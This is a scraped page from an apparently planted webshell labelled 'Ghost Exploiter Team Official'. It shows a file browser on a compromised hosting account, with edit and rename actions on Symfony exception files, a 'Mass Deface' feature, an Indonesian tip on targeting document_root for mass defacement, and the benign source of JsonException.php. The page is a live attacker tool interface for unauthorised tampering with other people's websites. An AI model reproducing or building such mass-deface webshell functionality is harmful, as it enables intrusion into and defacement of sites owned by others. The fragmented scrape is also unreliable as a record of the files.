webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
http-foundation
/
Exception
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BadRequestException.php
0.439KB
edt
ren
ConflictingHeadersExcep
...
0.514KB
edt
ren
JsonException.php
0.516KB
edt
ren
RequestExceptionInterfa
...
0.473KB
edt
ren
SessionNotFoundExceptio
...
0.823KB
edt
ren
SuspiciousOperationExce
...
0.516KB
edt
ren
UnexpectedValueExceptio
...
0.354KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpFoundation\Exception; /** * Thrown by Request::toArray() when the content cannot be JSON-decoded. * * @author Tobias Nyholm <tobias.nyholm@gmail.com> */ final class JsonException extends UnexpectedValueException implements RequestExceptionInterface { }